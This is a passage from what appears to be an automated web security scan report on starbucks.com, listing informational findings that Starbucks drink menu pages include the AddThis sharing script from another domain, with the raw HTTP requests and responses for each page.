Date: Tue, 08 Feb 2011 03:25:34 GMT
Connection: close
Content-Length: 43019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.114. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/peppermint-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:38 GMT
Connection: close
Content-Length: 43447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.115. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/peppermint-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:49 GMT
Connection: close
Content-Length: 43238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.116. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/pumpkin-spice-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/pumpkin-spice-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:25 GMT
Connection: close
Content-Length: 43526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.117. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/skinny-caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:29 GMT
Connection: close
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.118. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:30 GMT
Connection: close
Content-Length: 43541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.119. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-flavored-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/skinny-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:33 GMT
Connection: close
Content-Length: 43246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.120. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/toffee-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/toffee-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:36 GMT
Connection: close
Content-Length: 42742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.121. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:45 GMT
Connection: close
Content-Length: 43438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.122. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:23 GMT
Connection: close
Content-Length: 52308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.123. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:30 GMT
Connection: close
Content-Length: 45234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.124. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:36 GMT
Connection: close
Content-Length: 44795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.125. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:33 GMT
Connection: close
Content-Length: 43276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.126. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:39 GMT
Connection: close
Content-Length: 45066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.127. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:41 GMT
Connection: close
Content-Length: 43051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.128. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:22 GMT
Connection: close
Content-Length: 45037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.129. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:18 GMT
Connection: close
Content-Length: 45265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.130. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:00 GMT
Connection: close
Content-Length: 45316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.131. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:19 GMT
Connection: close
Content-Length: 43130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.132. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:21 GMT
Connection: close
Content-Length: 44774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

